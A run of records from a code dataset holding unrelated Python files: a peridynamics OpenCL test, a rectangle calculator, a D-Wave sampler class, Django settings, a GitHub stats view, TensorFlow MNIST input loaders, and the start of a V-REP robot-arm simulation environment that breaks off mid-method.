bond_force = program.bond_force\n bond_force(queue, n_neigh.shape, None, r_d, r0_d, nlist_d, n_neigh_d,\n np.int32(max_neigh), volume_d, np.float64(bond_stiffness),\n force_d)\n cl.enqueue_copy(queue, force_actual, force_d)\n\n assert np.allclose(force_actual, force_expected)\n\n @context_available\n def test_force(self, context, queue, program):\n \"\"\"Ensure forces are in the correct direction using a minimal model.\"\"\"\n r0 = np.array([\n [0.0, 0.0, 0.0],\n [1.0, 0.0, 0.0],\n [1.0, 1.0, 0.0],\n ], dtype=np.float64)\n horizon = 1.01\n elastic_modulus = 0.05\n bond_stiffness = 18.0 * elastic_modulus / (np.pi * horizon**4)\n max_neigh = 3\n volume = np.full(3, 0.16666667, dtype=np.float64)\n nlist, n_neigh = create_neighbour_list(r0, horizon, max_neigh)\n\n # Displace particles, but do not update neighbour list\n r = r0 + np.array([\n [0.0, 0.0, 0.0],\n [0.05, 0.0, 0.0],\n [0.05, 0.05, 0.0]\n ], dtype=np.float64)\n\n force_value = 0.00229417\n force_expected = np.array([\n [force_value, 0., 0.],\n [-force_value, force_value, 0.],\n [0., -force_value, 0.]\n ])\n force_actual = np.empty_like(force_expected)\n\n # Create buffers\n r_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=r)\n r0_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=r0)\n nlist_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=nlist)\n n_neigh_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=n_neigh)\n volume_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=volume)\n force_d = cl.Buffer(context, mf.WRITE_ONLY, force_expected.nbytes)\n\n # Call kernel\n bond_force = program.bond_force\n bond_force(queue, n_neigh.shape, None, r_d, r0_d, nlist_d, n_neigh_d,\n 
np.int32(max_neigh), volume_d, np.float64(bond_stiffness),\n                   force_d)\n        cl.enqueue_copy(queue, force_actual, force_d)\n\n        assert np.allclose(force_actual, force_expected)\n\n\n@context_available\ndef test_break_bonds(context, queue, program):\n    \"\"\"Test the break_bonds kernel.\"\"\"\n    r0 = np.array([\n        [0.0, 0.0, 0.0],\n        [1.0, 0.0, 0.0],\n        [0.0, 1.0, 0.0],\n        [2.0, 0.0, 0.0],\n        [0.0, 0.0, 1.0],\n        ])\n    horizon = 1.1\n    max_neigh = 3\n    nl, n_neigh = create_neighbour_list(r0, horizon, max_neigh)\n\n    nl_expected = np.array([\n        [1, 2, 4],\n        [0, 3, 0],\n        [0, 0, 0],\n        [1, 0, 0],\n        [0, 0, 0]\n        ])\n    n_neigh_expected = np.array([3, 2, 1, 1, 1])\n\n    assert np.all(nl == nl_expected)\n    assert np.all(n_neigh == n_neigh_expected)\n\n    r = np.array([\n        [0.0, 0.0, 0.0],\n        [2.0, 0.0, 0.0],\n        [0.0, 1.0, 0.0],\n        [3.0, 0.0, 0.0],\n        [0.0, 0.0, 2.0],\n        ])\n    critical_strain = 1.0\n\n    # Create buffers\n    r_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=r)\n    r0_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=r0)\n    nlist_d = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR,\n                        hostbuf=nl)\n    n_neigh_d = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR,\n                          hostbuf=n_neigh)\n\n    # Call kernel\n    break_bonds = program.break_bonds\n    break_bonds(queue, n_neigh.shape, None, r_d, r0_d, nlist_d, n_neigh_d,\n                np.int32(max_neigh), np.float64(critical_strain))\n    cl.enqueue_copy(queue, nl, nlist_d)\n    cl.enqueue_copy(queue, n_neigh, n_neigh_d)\n\n    nl_expected = np.array([\n        [2, 2, 4],\n        [3, 3, 0],\n        [0, 0, 0],\n        [1, 0, 0],\n        [0, 0, 0]\n        ])\n    n_neigh_expected = np.array([1, 1, 1, 1, 0])\n\n    assert np.all(nl == nl_expected)\n    assert np.all(n_neigh == n_neigh_expected)\n","sub_path":"peridynamics/test/test_cl.py","file_name":"test_cl.py","file_ext":"py","file_size_in_byte":9458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"551700900","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport math\r\n\r\nAB = float(input(\"Length of the first side\"))\r\nAC = float(input(\"Length of the second side\"))\r\n\r\nprint(\"Perimeter of the rectangle\", ((AB + AC) * 2))\r\nprint(\"Diagonal of the rectangle\", ((math.sqrt(AB ** 2 + AC ** 2))))\r\n","sub_path":"individual_2.py","file_name":"individual_2.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"379401930","text":"\"\"\"\nCreates a dimod Sampler_ for the D-Wave System.\n\n.. _Sampler: http://dimod.readthedocs.io/en/latest/reference/samplers.html#samplers-and-composites\n\"\"\"\nimport dimod\nimport dwave.cloud.qpu as qpuclient\n\n__all__ = ['DWaveSampler']\n\n\nclass DWaveSampler(dimod.Sampler, dimod.Structured):\n    \"\"\"dimod Sampler for a D-Wave System.\n\n    A :class:`dimod.Sampler` that allows the D-Wave System to be used with the Ocean tools.\n\n    Also inherits from :class:`dimod.Structured`.\n\n    Args:\n        config_file (str, optional):\n            Path to the configuration file.\n\n        profile (str, optional):\n            ID of the config profile.\n\n        endpoint (str, optional):\n            D-Wave API endpoint URL.\n\n        token (str, optional):\n            Authentication token for the D-Wave API.\n\n        solver (str, optional):\n            Default solver.\n\n        proxy (str, optional):\n            Proxy URL to be used for accessing the D-Wave API.\n
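\n    Example:\n        A minimal usage sketch; the solver name and the qubit/coupler indices\n        are illustrative placeholders that must exist on the actual machine:\n\n        >>> sampler = DWaveSampler(solver='EXAMPLE_SOLVER')  # doctest: +SKIP\n        >>> response = sampler.sample_ising({0: -1.0}, {(0, 4): 0.5})  # doctest: +SKIP\n\n    .. 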
_configuration: http://dwave-micro-client.readthedocs.io/en/latest/#configuration\n\n    \"\"\"\n    def __init__(self, config_file=None, profile=None, endpoint=None, token=None, solver=None,\n                 proxy=None, permissive_ssl=False):\n\n        self.client = client = qpuclient.Client.from_config(config_file=config_file, profile=profile,\n                                                            endpoint=endpoint, token=token, proxy=proxy,\n                                                            permissive_ssl=permissive_ssl)\n        self.solver = solver = client.get_solver(name=solver)\n\n        # need to set up the nodelist and edgelist, properties, parameters\n        self._nodelist = sorted(solver.nodes)\n        self._edgelist = sorted(set(tuple(sorted(edge)) for edge in solver.edges))\n        self._properties = solver.properties.copy()  # shallow copy\n        self._parameters = {param: ['parameters'] for param in solver.properties['parameters']}\n\n    @property\n    def properties(self):\n        \"\"\"dict: The properties as exposed by the SAPI web service.\"\"\"\n        return self._properties\n\n    @property\n    def parameters(self):\n        \"\"\"dict[str, list]: The keys are the keyword parameters accepted by the SAPI web service. The\n        values are lists of properties in :attr:`.DWaveSampler.properties` that are relevant to the\n        keyword.\n        \"\"\"\n        return self._parameters\n\n    @property\n    def edgelist(self):\n        \"\"\"list: The list of active couplers.\"\"\"\n        return self._edgelist\n\n    @property\n    def nodelist(self):\n        \"\"\"list: The list of active qubits.\"\"\"\n        return self._nodelist\n\n    def sample_ising(self, h, J, **kwargs):\n        \"\"\"Sample from the provided Ising model.\n\n        Args:\n            h (list/dict):\n                The linear biases of the model.\n\n            J (dict[(int, int): float]):\n                The quadratic biases of the model.\n\n            **kwargs:\n                Optional keyword arguments for the sampling method, specified per solver in\n                :attr:`.DWaveSampler.parameters`\n\n        Returns:\n            :class:`dimod.Response`\n\n        \"\"\"\n        if isinstance(h, list):\n            h = dict(enumerate(h))\n\n        variables = set(h).union(*J)\n        try:\n            active_variables = sorted(variables)\n        except TypeError:\n            active_variables = list(variables)\n        num_variables = len(active_variables)\n\n        data_vector_keys = {'energies': 'energy',\n                            'num_occurrences': 'num_occurrences'}\n        info_keys = {'timing'}\n\n        future = self.solver.sample_ising(h, J, **kwargs)\n        return dimod.Response.from_futures((future,), vartype=dimod.SPIN,\n                                           num_variables=num_variables,\n                                           data_vector_keys=data_vector_keys,\n                                           active_variables=active_variables,\n                                           info_keys=info_keys)\n\n    def sample_qubo(self, Q, **kwargs):\n        \"\"\"Sample from the provided QUBO.\n\n        Args:\n            Q (dict):\n                The QUBO coefficients.\n\n            **kwargs:\n                Optional keyword arguments for the sampling method, specified per solver in\n                :attr:`.DWaveSampler.parameters`\n\n        Returns:\n            :class:`dimod.Response`\n\n        \"\"\"\n        variables = set().union(*Q)\n        try:\n            active_variables = sorted(variables)\n        except TypeError:\n            active_variables = list(variables)\n        num_variables = len(active_variables)\n\n        data_vector_keys = {'energies': 'energy',\n                            'num_occurrences': 'num_occurrences'}\n        info_keys = {'timing'}\n\n        future = self.solver.sample_qubo(Q, **kwargs)\n        return dimod.Response.from_futures((future,), vartype=dimod.BINARY,\n                                           num_variables=num_variables,\n                                           data_vector_keys=data_vector_keys,\n                                           active_variables=active_variables,\n                                           info_keys=info_keys)\n","sub_path":"dwave/system/samplers/dwave_sampler.py","file_name":"dwave_sampler.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"478025638","text":"\"\"\"Django settings for albums 
project.\r\n\"\"\"\r\nimport pathlib\r\nHOME = pathlib.Path(__file__).parent.resolve()\r\n\r\n# Make this unique, and don't share it with anybody.\r\nSECRET_KEY = ''\r\n\r\nDEBUG = True\r\n\r\nALLOWED_HOSTS = ['.lemoncurry.nl']\r\n\r\nINSTALLED_APPS = (\r\n    'django.contrib.admin',\r\n    'django.contrib.auth',\r\n    'django.contrib.contenttypes',\r\n    'django.contrib.sessions',\r\n    'django.contrib.sites',\r\n    'django.contrib.messages',\r\n    'django.contrib.staticfiles',\r\n    'albums.muziek',\r\n    'django.contrib.admindocs',\r\n)\r\n\r\nMIDDLEWARE_CLASSES = (\r\n    'django.contrib.sessions.middleware.SessionMiddleware',\r\n    'django.middleware.common.CommonMiddleware',\r\n    'django.middleware.csrf.CsrfViewMiddleware',\r\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\r\n    'django.contrib.messages.middleware.MessageMiddleware',\r\n    'django.middleware.clickjacking.XFrameOptionsMiddleware',  # new in 1.6\r\n    'django.middleware.security.SecurityMiddleware',  # new in 1.8\r\n)\r\n\r\nROOT_URLCONF = 'albums.urls'\r\n\r\nTEMPLATES = [\r\n    {\r\n        'BACKEND': 'django.template.backends.django.DjangoTemplates',\r\n        'DIRS': [\r\n            str(HOME / 'templates'),\r\n        ],\r\n        'APP_DIRS': True,\r\n        'OPTIONS': {\r\n            'context_processors': [\r\n                'django.template.context_processors.debug',\r\n                'django.template.context_processors.request',\r\n                'django.contrib.auth.context_processors.auth',\r\n                'django.contrib.messages.context_processors.messages',\r\n            ],\r\n            ## 'loaders': [\r\n            ##     # 'django.template.loaders.eggs.Loader',\r\n            ##     'django.template.loaders.filesystem.Loader',\r\n            ##     'django.template.loaders.app_directories.Loader',\r\n            ##     ],\r\n        },\r\n    },\r\n]\r\n\r\nWSGI_APPLICATION = 'albums.wsgi.application'\r\n\r\nADMINS = (\r\n    # ('Your Name', 'your_email@domain.com'),\r\n)\r\n\r\nMANAGERS = ADMINS\r\n\r\nDATABASES = {\r\n    'default': {\r\n        'ENGINE': 'django.db.backends.sqlite3',\r\n        'NAME': str(HOME / 'albums.db'),\r\n        'USER': '',      # Not used with sqlite3.\r\n        'PASSWORD': '',  # Not used with sqlite3.\r\n        'HOST': '',      # Set to empty string for localhost. Not used with sqlite3.\r\n        'PORT': '',      # Set to empty string for default. Not used with sqlite3.\r\n    }\r\n}\r\n\r\n# Local time zone for this installation. Choices can be found here:\r\n# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE\r\n# although not all variations may be possible on all operating systems.\r\n# If running in a Windows environment this must be set to the same as your\r\n# system time zone.\r\nTIME_ZONE = 'Europe/Amsterdam'\r\n\r\n# Language code for this installation. 
All choices can be found here:\r\n# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes\r\n# http://blogs.law.harvard.edu/tech/stories/storyReader$15\r\nLANGUAGE_CODE = 'en-us'\r\n\r\nSITE_ID = 1\r\n\r\n# If you set this to False, Django will make some optimizations so as not\r\n# to load the internationalization machinery.\r\nUSE_I18N = True\r\n\r\n# If you set this to False, Django will not format dates, numbers and\r\n# calendars according to the current locale.\r\nUSE_L10N = True\r\n\r\n# If you set this to False, Django will not use timezone-aware datetimes.\r\nUSE_TZ = True\r\n\r\n# Absolute path to the directory that holds media.\r\n# Example: \"/home/media/media.lawrence.com/\"\r\n# MEDIA_ROOT = \"C:/Python25/Lib/site-packages/django/contrib/admin/media/\"\r\nMEDIA_ROOT = str(HOME / \"files/\")\r\n\r\n# URL that handles the media served from MEDIA_ROOT.\r\n# Example: \"http://media.lawrence.com\"\r\nMEDIA_URL = 'http://albums.lemoncurry.nl/files/'\r\n\r\n# Absolute path to the directory static files should be collected to.\r\n# Don't put anything in this directory yourself; store your static files\r\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\r\n# Example: \"/home/media/media.lawrence.com/static/\"\r\nSTATIC_ROOT = ''\r\n\r\n# URL prefix for static files.\r\n# Example: \"http://media.lawrence.com/static/\"\r\nSTATIC_URL = '/static/'\r\n\r\n# Additional locations of static files\r\nSTATICFILES_DIRS = (\r\n    # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\r\n    # Always use forward slashes, even on Windows.\r\n    # Don't forget to use absolute paths, not relative paths.\r\n)\r\n\r\n# List of finder classes that know how to find static files in\r\n# various locations.\r\nSTATICFILES_FINDERS = (\r\n    'django.contrib.staticfiles.finders.FileSystemFinder',\r\n    'django.contrib.staticfiles.finders.AppDirectoriesFinder',\r\n    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',\r\n)\r\n\r\nSESSION_COOKIE_DOMAIN = 'albums.lemoncurry.nl'\r\n","sub_path":"albums/settings_no_key.py","file_name":"settings_no_key.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"65262902","text":"\"\"\" Handler for URLs for the http://github.com service.\nGitHub doesn't really have a decent oauth service so again we\nare hitting public json feeds and processing those.\n\"\"\"\n\nfrom datetime import datetime\nfrom causal.main.decorators import can_view_service\nfrom causal.main.models import UserService, Auth\nfrom causal.main.utils.services import get_model_instance, \\\n     settings_redirect, check_is_service_id, get_data\nfrom causal.main.utils.views import render\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, redirect\nfrom datetime import date, timedelta\n\nPACKAGE = 'causal.github'\n\n@login_required(redirect_field_name='redirect_to')\ndef auth(request):\n    \"\"\"We don't need a full oauth setup, just a username.\n    \"\"\"\n\n    service = get_model_instance(request.user, PACKAGE)\n    if service and request.method == 'POST':\n        username = request.POST['username']\n\n        if username:\n            user_feed = get_data(\n                service,\n                'https://api.github.com/users/%s' % (username),\n                disable_oauth=True\n            )\n\n            if 'message' in user_feed and user_feed['message'] == \"Not Found\":\n                messages.error(request,\n                               'Unable to validate your username with github, please check your username 
and retry.')\n                return redirect(settings_redirect(request))\n\n            if not service.auth:\n                auth_handler = Auth()\n            else:\n                auth_handler = service.auth\n\n            auth_handler.username = username\n            auth_handler.save()\n\n            if not service.auth:\n                service.auth = auth_handler\n\n            service.setup = True\n            service.public = True\n            service.save()\n\n        else:\n            messages.error(request, 'Please enter a github username')\n\n    return redirect(settings_redirect(request))\n\n@can_view_service\ndef stats(request, service_id):\n    \"\"\"Compute some stats.\n    \"\"\"\n\n    service = get_object_or_404(UserService, pk=service_id)\n\n    if check_is_service_id(service, PACKAGE):\n        commits, avatar, commit_times, common_time, days_committed, max_commits_on_a_day = service.handler.get_stats_items(date.today() - timedelta(days=7))\n\n        return render(\n            request,\n            {\n                'commits': commits,\n                'avatar' : avatar,\n                'commit_times' : commit_times,\n                'common_time' : common_time,\n                'days_committed' : days_committed, \n                'max_commits_on_a_day' : max_commits_on_a_day\n            },\n            'causal/github/stats.html'\n        )\n    else:\n        return redirect('/%s' % (request.user.username,))\n","sub_path":"src/causal/github/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"613067159","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport os\n\nimport scipy.misc\n\n\n# df = pd.read_csv('./kaggle/train.csv', sep=',')\n# labels = df.iloc[:, :1]\n# images = df.iloc[:, 1:]\n# print(labels)\n\ndef _fixed_sides_resize(image, output_height, output_width):\n    \"\"\"Resize images by fixed sides.\n\n    Args:\n        image: A 3-D image `Tensor`.\n        output_height: The height of the image after preprocessing.\n        output_width: The width of the image after preprocessing.\n\n    Returns:\n        resized_image: A 3-D tensor containing the resized image.\n    \"\"\"\n    output_height = tf.convert_to_tensor(output_height, dtype=tf.int32)\n    output_width = tf.convert_to_tensor(output_width, dtype=tf.int32)\n\n    image = tf.expand_dims(image, 0)\n    resized_image = tf.image.resize_nearest_neighbor(\n        image, [output_height, output_width], align_corners=False)  # returns [batch, height, width, channels]\n    resized_image = tf.squeeze(resized_image, 0)  # drop the batch dim, leaving [224, 224, 1]\n    resized_image = tf.concat([resized_image, resized_image, resized_image], -1)  # stack the single channel into 3 channels\n    # resized_image = tf.expand_dims(resized_image, 2)\n    # resized_image.set_shape([None, None, 1])\n    return resized_image\n\n\ndef read(df):\n    dataset = tf.data.Dataset.from_tensor_slices(dict(df))\n\n    def map_fn(element, label_feat):\n        # element is a {'c0': int, 'c1': str, 'c2': int} dictionary\n        label = element.pop(label_feat)\n        # img = list(element.values())\n        return (element, label)\n\n\n    # Split it into features, label tuple\n    dataset = dataset.map(lambda elem: map_fn(elem, 'label'))\n\n    # One shot iterator iterates through the (repeated) dataset once\n\n    iterator = dataset.make_one_shot_iterator()\n    image, label = iterator.get_next()\n\n    # image_raw = tf.reshape(image, [28, 28])\n\n    # images, label_batch = tf.train.batch(\n    #     [image_raw, label],\n    #     batch_size=32,\n    #     num_threads=1,\n    #     capacity=64)\n\n    # n_classes = 10\n    # label_batch = tf.one_hot(label_batch, depth=n_classes)\n    # label_batch = tf.cast(label_batch, dtype=tf.int32)\n    # label_batch = tf.reshape(label_batch, [32, n_classes])\n\n    return image, label\n
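\n\n# Illustrative usage sketch (not in the original file). The loaders below\n# assume a Kaggle \"Digit Recognizer\" style CSV: a 'label' column followed by\n# 784 pixel columns, one row per 28x28 image. Roughly:\n#\n#     df = pd.read_csv('train.csv')              # hypothetical path\n#     image, label = get(df, batch_size=32)      # image: (32, 28, 28, 1), label: (32,)\n#     with tf.Session() as sess:\n#         imgs, labels = sess.run([image, label])\n\ndef get(df, batch_size):\n\n    def _parse_function(label, img):\n        image_raw = tf.reshape(img, [28, 28, 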
1])\n        return label, image_raw\n\n    labels = df['label']\n    df.drop(['label'], axis=1, inplace=True)\n    imgs = df\n    dataset = tf.data.Dataset.from_tensor_slices((labels, imgs))\n    dataset = dataset.map(_parse_function)\n    dataset = dataset.repeat(10)\n    dataset = dataset.batch(batch_size)\n\n    iterator = dataset.make_one_shot_iterator()\n    label, image = iterator.get_next()\n    return image, label\n\ndef val(df, batch_size):\n    def _parse_function(img):\n        image_raw = tf.reshape(img, [28, 28, 1])\n        return image_raw\n\n    dataset = tf.data.Dataset.from_tensor_slices(df)\n    dataset = dataset.map(_parse_function)\n    dataset = dataset.batch(batch_size)\n\n    iterator = dataset.make_one_shot_iterator()\n    image = iterator.get_next()\n    return image\n\ndef get_resnet(df, batch_size):\n    def _parse_function(image, label):\n        img = tf.reshape(image, [28, 28, 1])\n        image_raw = _fixed_sides_resize(img, 224, 224)\n        return tf.to_float(image_raw), label\n\n    labels = df['label']\n    df.drop(['label'], axis=1, inplace=True)\n    imgs = df\n    # dataset = tf.data.Dataset.from_tensor_slices((labels, imgs))\n    dataset = tf.data.Dataset.from_tensor_slices((imgs, labels))\n    dataset = dataset.map(_parse_function)\n    dataset = dataset.repeat(10)\n    # dataset = dataset.batch(batch_size)\n    dataset = dataset.apply(tf.contrib.data.batch_and_drop_remainder(batch_size))\n    # dataset = dataset.prefetch(2)\n    return dataset\n\n    # # ResNet takes the dataset object as input, so no further unpacking is needed\n    # iterator = dataset.make_one_shot_iterator()\n    # label, image = iterator.get_next()\n    # return image, label\n\ndef get_resnet_val(df):\n    def _parse_function(image):\n        img = tf.reshape(image, [28, 28, 1])\n        image_raw = _fixed_sides_resize(img, 224, 224)\n        return tf.to_float(image_raw)\n\n    imgs = df\n    dataset = tf.data.Dataset.from_tensor_slices(imgs)\n    dataset = dataset.map(_parse_function)\n\n    iterator = dataset.make_one_shot_iterator()\n    image = iterator.get_next()\n    return image\n\n# with tf.Session() as sess:\n#     sess.run(tf.global_variables_initializer())\n#     df = pd.read_csv('./kaggle/Digit Recognizer/data/train.csv', sep=',')\n#     reshaped_image = get_resnet(df, 10)\n#\n#     for i in range(1):\n#         # each sess.run(reshaped_image) fetches one image\n#         imgs, labels = sess.run(reshaped_image)\n#         k = 0\n#         print('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')\n#         for img in imgs:\n#             print('cccccccccccccccccccccccccccccccccccccc')\n#             # np.savetxt(\"prediction\" + str(k) + \".csv\", img, delimiter=\",\")\n#             scipy.misc.imsave('./kaggle/Digit Recognizer/output/img/test_%d.jpg' % k, img)\n#             # with open() as f:\n#             #     f.write(img)\n#             k += 1\n#         for label in labels:\n#             print(label)\n#         # print(imgs)\n#         # np.savetxt(\"prediction\" + str(i) + \".csv\", img, delimiter=\",\")\n#         # print(label)\n\n# with tf.Session() as sess:\n#     sess.run(tf.global_variables_initializer())\n#     df = pd.read_csv('./kaggle/test.csv', sep=',')\n#     image_raw = sess.run(tf.reshape(df[5:6], [28, 28]))\n#     np.savetxt(\"prediction.csv\", image_raw, delimiter=\",\")","sub_path":"kaggle/Digit Recognizer/input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"122481543","text":"# V-REP environment (dynamics enabled)\n# synchronous mode\n\nimport vrep\nimport math\nimport time\nimport numpy as np\n\nclass VREP_server(object):\n    ToDeg = 180.0 / math.pi  # constant: radians to degrees\n    ToRad = math.pi / 180.0  # constant: degrees to radians\n    dt = 0.05  # simulation time step: 50 ms\n    state_dim = 12\n    action_dim = 6\n    # joint configuration\n    rewardflag = [1,1,1]\n    jointNum = 3\n    jointName = 'joint'\n    linkName = 'link'\n    obsName = 'obs1'\n
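    # Home joint configurations (in radians); reset() drives both arms back to these poses.\n    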
config1 = [56. *ToRad,-30.*ToRad,-30.*ToRad]\n    config2 = [60.*ToRad, -35.*ToRad, -30.*ToRad]\n    action_bound = [-1, 1]  # limits on the action magnitude\n    joint_bound = [-90.*ToRad,90.*ToRad]\n    get_point = False  # reached the target point\n    grab_counter = 0  # counts steps spent at the target point\n    area = 0.05\n    get_obstacles = False  # touched an obstacle\n    obstacles_counter = 0  # obstacle-contact counter\n\n    def __init__(self):\n        # establish the connection\n        vrep.simxFinish(-1)\n        # poll every 0.1 s until connected to V-REP\n        while True:\n            self.clientID = vrep.simxStart('127.0.0.1', 19999, True, True, 5000, 5)\n            if self.clientID != -1:\n                break\n            else:\n                time.sleep(0.1)\n                print(\"Failed connecting to remote API server!\")\n        print(\"Connection success!\")\n        # set the simulation time step so the API side matches the V-REP side\n        vrep.simxSetFloatingParameter(self.clientID, vrep.sim_floatparam_simulation_time_step, self.dt, vrep.simx_opmode_oneshot)\n        # then switch on synchronous mode\n        vrep.simxSynchronous(self.clientID, True)\n        vrep.simxStartSimulation(self.clientID, vrep.simx_opmode_oneshot)\n\n        # get joint handles\n        self.robot1_jointHandle = np.zeros((self.jointNum,), dtype=int)  # joint handles\n        self.robot2_jointHandle = np.zeros((self.jointNum,), dtype=int)  # joint handles\n        for i in range(self.jointNum):\n            _, returnHandle = vrep.simxGetObjectHandle(self.clientID, self.jointName + str(i + 1),\n                                                       vrep.simx_opmode_blocking)\n            self.robot1_jointHandle[i] = returnHandle\n        for i in range(self.jointNum):\n            _, returnHandle = vrep.simxGetObjectHandle(self.clientID, self.jointName + str(i + 4),\n                                                       vrep.simx_opmode_blocking)\n            self.robot2_jointHandle[i] = returnHandle\n        # get link handles\n        self.robot1_linkHandle = np.zeros((self.jointNum,), dtype=int)  # link handles\n        self.robot2_linkHandle = np.zeros((self.jointNum,), dtype=int)  # link handles\n        for i in range(self.jointNum):\n            _, returnHandle = vrep.simxGetObjectHandle(self.clientID, self.linkName + str(i + 1),\n                                                       vrep.simx_opmode_blocking)\n            self.robot1_linkHandle[i] = returnHandle\n        for i in range(self.jointNum):\n            _, returnHandle = vrep.simxGetObjectHandle(self.clientID, self.linkName + str(i + 4),\n                                                       vrep.simx_opmode_blocking)\n            self.robot2_linkHandle[i] = returnHandle\n        # get collision handles\n        _, self.robot1_collisionHandle = vrep.simxGetCollisionHandle(self.clientID, 'Collision_robot1', vrep.simx_opmode_blocking)\n        _, self.robot2_collisionHandle = vrep.simxGetCollisionHandle(self.clientID, 'Collision_robot2', vrep.simx_opmode_blocking)\n\n        # get distance handles\n        # _,self.mindist_robot1_Handle = vrep.simxGetDistanceHandle(self.clientID,'dis_robot1',vrep.simx_opmode_blocking)\n        # _,self.mindist_robot2_Handle = vrep.simxGetDistanceHandle(self.clientID,'dis_robot2', vrep.simx_opmode_blocking)\n        # _,self.mindist_robots_Handle = vrep.simxGetDistanceHandle(self.clientID,'robots_dist', vrep.simx_opmode_blocking)\n        _,self.robot1_goal_Handle = vrep.simxGetDistanceHandle(self.clientID,'robot1_goal',vrep.simx_opmode_blocking)\n        _,self.robot2_goal_Handle = vrep.simxGetDistanceHandle(self.clientID,'robot2_goal',vrep.simx_opmode_blocking)\n        # get end-effector handles\n        _,self.end1_Handle = vrep.simxGetObjectHandle(self.clientID, 'end',vrep.simx_opmode_blocking)\n        _,self.end2_Handle = vrep.simxGetObjectHandle(self.clientID,'end0',vrep.simx_opmode_blocking)\n\n        _,self.goal1_Handle = vrep.simxGetObjectHandle(self.clientID, 'goal_1',vrep.simx_opmode_blocking)\n        _,self.goal2_Handle = vrep.simxGetObjectHandle(self.clientID, 'goal_2', vrep.simx_opmode_blocking)\n\n        _,self.goal_1 = vrep.simxGetObjectPosition(self.clientID,self.goal1_Handle,-1,vrep.simx_opmode_blocking)\n        _,self.goal_2 = vrep.simxGetObjectPosition(self.clientID, self.goal2_Handle, -1,vrep.simx_opmode_blocking)\n
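        # Drop the z-coordinates: positions are handled in the 2-D plane from here on.\n        del self.goal_1[2]\n        del self.goal_2[2]\n        self.goal_1 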
= np.array(self.goal_1)\n self.goal_2 = np.array(self.goal_2)\n self.jointConfig1 = np.zeros((self.jointNum,))\n self.jointConfig2 = np.zeros((self.jointNum,))\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot1_jointHandle[i],vrep.simx_opmode_streaming)\n self.jointConfig1[i] = jpos\n for i in range(self.jointNum):\n _, jpos = vrep.simxGetJointPosition(self.clientID, self.robot2_jointHandle[i],vrep.simx_opmode_streaming)\n self.jointConfig2[i] = jpos\n\n _, collision1 = vrep.simxReadCollision(self.clientID, self.robot1_collisionHandle, vrep.simx_opmode_streaming)\n _, collision2 = vrep.simxReadCollision(self.clientID, self.robot2_collisionHandle, vrep.simx_opmode_streaming)\n _, pos1 = vrep.simxGetObjectPosition(self.clientID, self.end1_Handle, -1, vrep.simx_opmode_streaming)\n _, pos2 = vrep.simxGetObjectPosition(self.clientID, self.end2_Handle, -1, vrep.simx_opmode_streaming)\n _, d1 = vrep.simxReadDistance(self.clientID, self.robot1_goal_Handle, vrep.simx_opmode_streaming)\n _, d2 = vrep.simxReadDistance(self.clientID, self.robot2_goal_Handle, vrep.simx_opmode_streaming)\n for i in range(self.jointNum):\n _,returnpos = vrep.simxGetObjectPosition(self.clientID,self.robot1_linkHandle[i],-1, vrep.simx_opmode_streaming)\n\n for i in range(self.jointNum):\n _,returnpos = vrep.simxGetObjectPosition(self.clientID,self.robot2_linkHandle[i],-1,vrep.simx_opmode_streaming)\n print('data available!')\n self.currCmdTime = vrep.simxGetLastCmdTime(self.clientID)\n self.lastCmdTime = self.currCmdTime\n vrep.simxSynchronousTrigger(self.clientID)\n\n def moveto(self,config1,config2):\n vrep.simxPauseCommunication(self.clientID, True)\n for i in range(self.jointNum):\n vrep.simxSetJointTargetPosition(self.clientID,self.robot1_jointHandle[i], config1[i], vrep.simx_opmode_oneshot)\n for i in range(self.jointNum):\n vrep.simxSetJointTargetPosition(self.clientID,self.robot2_jointHandle[i], config2[i],vrep.simx_opmode_oneshot)\n def getCollisonStates(self):\n _, collision1 = vrep.simxReadCollision(self.clientID,self.robot1_collisionHandle ,vrep.simx_opmode_buffer)\n _, collision2 = vrep.simxReadCollision(self.clientID, self.robot2_collisionHandle,vrep.simx_opmode_buffer)\n return collision1,collision2\n\n def reset(self):\n self.get_point = False\n self.grab_counter = 0\n self.get_obstacles = False\n self.obstacles_counter = 0\n self.currCmdTime = vrep.simxGetLastCmdTime(self.clientID)\n # dt = (self.currCmdTime - self.lastCmdTime) / 1000\n\n 